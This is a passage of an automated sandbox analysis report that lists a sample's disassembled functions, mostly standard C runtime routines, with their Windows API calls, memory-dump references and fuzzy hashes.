Instruction Fuzzy Hash: 80D0673100020CABCB617FA1D9489893F66AB54281BA04050F9C946029DB3E99D5DF94

Function 0101A0F8 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01019C26: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 01019C51

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,01019F3D,?,00000000,?,?,?), ref: 0101A159
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,01019F3D,?,00000000,?,?,?), ref: 0101A19B

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 0943150be261bbdc7fcb27186dff05efe8ebad4f86b0775846064ab8fc5d7b96
Instruction ID: 81cc2898429f2b983ac09ad11e2226df75145ddd56a38b891a053d1fe35c4526
Opcode Fuzzy Hash: 0943150be261bbdc7fcb27186dff05efe8ebad4f86b0775846064ab8fc5d7b96
Instruction Fuzzy Hash: A2511070B01295DEEB22CF6DC8806EABBE5EF41314F1884AED1C68B249E67E9545CB50

Function 010160B6 Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,01018C6A,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 010160EA
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,01018C6A,?,?,00000000,?,00000000), ref: 01016108

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: c8f3a63f2fdcb87a9fb2398561d74159b15304f9c501310fe2edb8db0fec8ca6
Instruction ID: c30f7fc96c4b8519419fb235bcfb348007b908ff69f9874d98465476b826adfa
Opcode Fuzzy Hash: c8f3a63f2fdcb87a9fb2398561d74159b15304f9c501310fe2edb8db0fec8ca6
Instruction Fuzzy Hash: 4BF0683200011EBBCF225F90DD04DDE3E66AB58760F098110FA5865124C67BC971AB90

Function 01019CFA Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(E8458D00,?,01019F49,01019F3D,00000000), ref: 01019D2C

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 07e4ade0e30511ca608e27e125d1b46e7650ba34f6468f9f19f05a7f9faa229a
Instruction ID: 7b036e04dcbafb3a8bc30070a3a9212a42bd4a00eaf67ce56e95a32547c2612f
Opcode Fuzzy Hash: 07e4ade0e30511ca608e27e125d1b46e7650ba34f6468f9f19f05a7f9faa229a
Instruction Fuzzy Hash: E1514A719042589ADB228E28CC90BEA7BFDEB55308F2405EDD5DAC7146D2399E45CF20

Function 01015D63 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c264a29e9bbbccb64d383ad2d7688a28c1335ab881367f0f8cc4b84ea480be0
Instruction ID: 41b1a2539fd47584614b781987a2ba43b1ed3688c2badd91bba37a1307e22d20
Opcode Fuzzy Hash: 7c264a29e9bbbccb64d383ad2d7688a28c1335ab881367f0f8cc4b84ea480be0
Instruction Fuzzy Hash: C401B5337102159FAB369D6DEC85E5F37D6EBC62347648125FA81DF18CDA3D98028790

Non-executed Functions

Function 0101D0ED Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0101D2D1

Strings

1#INF, xrefs: 0101D223
1#QNAN, xrefs: 0101D200
1#IND, xrefs: 0101D1F2
1#SNAN, xrefs: 0101D1F9

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: cdb15ed3d7c29119ebf9f4d35830cfa5aa13ecc0af462d7ca9151a4636463ca3
Instruction ID: 36f18177af655ead7a3ca66c37505e36032d8d4a6b5663210ea18c275745aefc
Opcode Fuzzy Hash: cdb15ed3d7c29119ebf9f4d35830cfa5aa13ecc0af462d7ca9151a4636463ca3
Instruction Fuzzy Hash: 8BD22871E082298FDB65CE68CD447EEB7F5EB44304F1445EAD88DE7244EB78AA858F40

Function 0101C566 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,0101C884,00000002,00000000,?,?,?,0101C884,?,00000000), ref: 0101C5FF
GetLocaleInfoW.KERNEL32(?,20001004,0101C884,00000002,00000000,?,?,?,0101C884,?,00000000), ref: 0101C628
GetACP.KERNEL32(?,?,0101C884,?,00000000), ref: 0101C63D

Strings

ACP, xrefs: 0101C584
OCP, xrefs: 0101C5BA

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: b077ac35ddf5d6cf0f8b65978168898576070f1f88e8d88e897ab8e13bb7d5f3
Instruction ID: 8ea9bc34874a4ac8c7f31b7a142f38073f4d22492e00aa2f646e35f98c32017a
Opcode Fuzzy Hash: b077ac35ddf5d6cf0f8b65978168898576070f1f88e8d88e897ab8e13bb7d5f3
Instruction Fuzzy Hash: D021CB32680101A6FB758F5CCB01B9777E7AB44E54B5648A4E9CAD710DF73AEE81C350

Function 0101C73B Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 01014C01: GetLastError.KERNEL32(?,00000008,010191D2), ref: 01014C05
Part of subcall function 01014C01: SetLastError.KERNEL32(00000000,0102B440,00000024,01010169), ref: 01014CA7

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0101C847
IsValidCodePage.KERNEL32(00000000), ref: 0101C890
IsValidLocale.KERNEL32(?,00000001), ref: 0101C89F
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0101C8E7
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0101C906

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 1e10d4c5425d2a24c6f692a3434e14f0a6a60c8b220bf27e48e68aea8e27e201
Instruction ID: d99e275e4eda9c54f8d6013510537c906492a0133a4a0f39424458838e6b597c
Opcode Fuzzy Hash: 1e10d4c5425d2a24c6f692a3434e14f0a6a60c8b220bf27e48e68aea8e27e201
Instruction Fuzzy Hash: 9E51B471940206AFFB60DFA9CD80ABE77F8BF14710F044469EA85E7144E7B9D900CB61

Function 0101BDD7 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 01014C01: GetLastError.KERNEL32(?,00000008,010191D2), ref: 01014C05
Part of subcall function 01014C01: SetLastError.KERNEL32(00000000,0102B440,00000024,01010169), ref: 01014CA7

GetACP.KERNEL32(?,?,?,?,?,?,01011598,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0101BE98
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,01011598,?,?,?,00000055,?,-00000050,?,?), ref: 0101BEC3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0101C026

Strings

utf8, xrefs: 0101BF95

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: dbf99cf79213623b2d72c22aa2a4d67cac6e5a1b6895fbbbbcdb4d992e92022e
Instruction ID: 89ac3d14cc17a49b79ec527bcb0fd9e44817e76bc7f2c5c1ef20b06887fc8ea9
Opcode Fuzzy Hash: dbf99cf79213623b2d72c22aa2a4d67cac6e5a1b6895fbbbbcdb4d992e92022e
Instruction Fuzzy Hash: 07713731600206AAE725AB79CD45FBA77F8EF58700F044469F6C5D7188EB7DE940CBA0

Function 010139E2 Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 01013A6F

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 9a92425b85d41a9d34d0b4961e78f920fefde47b9ac17fa4fdf8223bb6267088
Instruction ID: 3c097ac68a3a7fd2f2099dda0dbf39e525dcdcaee80ca07aa771820b34dbc7b8
Opcode Fuzzy Hash: 9a92425b85d41a9d34d0b4961e78f920fefde47b9ac17fa4fdf8223bb6267088
Instruction Fuzzy Hash: 13B14872D0424A9FDB158F6CC8817EEBFE5FF55360F1481AAE985AF245D238D901C7A0

Function 01007672 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0100767E
IsDebuggerPresent.KERNEL32 ref: 0100774A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01007763
UnhandledExceptionFilter.KERNEL32(?), ref: 0100776D

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 3c5d7c9d84ca9357be377fa1dbaed53617287470465b8d1c9847dd61f27099dd
Instruction ID: 2adebf2aac1104c81a00cb0f99a14b9f6281f1fc4a370ec9eed6b88d4806e7e2
Opcode Fuzzy Hash: 3c5d7c9d84ca9357be377fa1dbaed53617287470465b8d1c9847dd61f27099dd
Instruction Fuzzy Hash: D131FA75D012199BEB61DFA4D9897CDBBB4BF08300F1041EAE54CAB280EB799A85CF45

Function 0101C1EA Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 01014C01: GetLastError.KERNEL32(?,00000008,010191D2), ref: 01014C05
Part of subcall function 01014C01: SetLastError.KERNEL32(00000000,0102B440,00000024,01010169), ref: 01014CA7

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0101C23E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0101C288
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0101C34E

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 7ebe0729d59df11bd7b3108795ee6e6f86e86c0933256e93bef57abfe5f5d51d
Instruction ID: 4e3c1cac821af690e04dc1edc28918eb8d588266d760ff82810625a277f8219b
Opcode Fuzzy Hash: 7ebe0729d59df11bd7b3108795ee6e6f86e86c0933256e93bef57abfe5f5d51d
Instruction Fuzzy Hash: BF61A4715801079BFB69DF68CE81BBA77E8EF04300F1480B9E995C6589EB3DD991CB50

Function 0100D7C3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0100D8BB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0100D8C5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0100D8D2

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: b753e80ed4a44ce8dac44ec3aa06c6cd42e8cb46e425f5b3f8feb8501a33015e
Instruction ID: 6bacdab4c28f7fc694d24042c783bf0e9d23e027e664312a489bbf3c3cf58fde
Opcode Fuzzy Hash: b753e80ed4a44ce8dac44ec3aa06c6cd42e8cb46e425f5b3f8feb8501a33015e
Instruction Fuzzy Hash: 2731E57490121DABDB62DF68D9887CCBBF8BF08310F5041EAE54CA7290EB349B858F44

Function 0100FC40 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f60d13b086af9ec0a587f738e4390bc211143032b3e107f6518dc9868b69a40
Instruction ID: c5ae3384e3e3caa25accaa181a07630ce1477f46131aba75ade200b3fd3869e5
Opcode Fuzzy Hash: 3f60d13b086af9ec0a587f738e4390bc211143032b3e107f6518dc9868b69a40
Instruction Fuzzy Hash: E2F14F71E0021A9FDF25CF68C8806ADBBF1FF88324F1582ADE955A7385D734AD458B80

Function 01048465 Relevance: 2.9, Strings: 2, Instructions: 440COMMON

Download Yara Rule

Strings

/, xrefs: 01048518
UT, xrefs: 01048790

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: e0872cb26255705f7d48561bd0d36eae2ccbb937a8561f5ea2d9795a88105742
Instruction ID: a2c45186af8c8fb62dba92d585364e6bd6910fbf68ccd24b45aea24f9fbd07f8
Opcode Fuzzy Hash: e0872cb26255705f7d48561bd0d36eae2ccbb937a8561f5ea2d9795a88105742
Instruction Fuzzy Hash: B00270F19042698BDF65DFA8C8C039E7BB5AF45304F0488FAD988A7242D7749E84CF95

Function 010454FD Relevance: 2.7, Strings: 2, Instructions: 178COMMON

Download Yara Rule

Strings

``C, xrefs: 01045573
x`C, xrefs: 0104558C

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ``C$x`C
API String ID: 0-4276601940
Opcode ID: 4639c864b91f6e9cc3f469510a2f9944f86d2f54ec5b532889058d1e4e41c286
Instruction ID: 7ea1cd64625549a3bfe1f8e46fe51788a4f800b7aeb334f4a7c2dbaa3bbb155e
Opcode Fuzzy Hash: 4639c864b91f6e9cc3f469510a2f9944f86d2f54ec5b532889058d1e4e41c286
Instruction Fuzzy Hash: 0D51B3B39001169BEB18CF58D8C16F977B2EF98304F2684BDC98AAF285EB705945CB50

Function 0101547C Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,01015477,?,?,00000008,?,?,01021335,00000000), ref: 010156A9

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 3fa7e2c2b243877d77925cc9eae9c4ad4296c57512b02c7a80c554692832238b
Instruction ID: 7a4d901bdabea760a444dd4d89c50f979f9f3df8f74ef9a8f15d264eb47ca977
Opcode Fuzzy Hash: 3fa7e2c2b243877d77925cc9eae9c4ad4296c57512b02c7a80c554692832238b
Instruction Fuzzy Hash: 6CB14C31210604CFE755CF2CC896A657BE1FF86364F258698E9DACF2A5C739E981CB40

Function 01006FEC Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 01007002

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 72954e61b786a16a3ad1eedca157868fc34d16d86e12ee3945d34a2dda248f10
Instruction ID: 0ae448878a2c01a5e42016c626315910d3a64b2b9d8915632b1b7e8af2ed6e97
Opcode Fuzzy Hash: 72954e61b786a16a3ad1eedca157868fc34d16d86e12ee3945d34a2dda248f10
Instruction Fuzzy Hash: 5FA16B719012058BFB79CFA8D5C27ADBBF1FB49714F24826AE599E7285C33DA440CB90

Function 0101980F Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
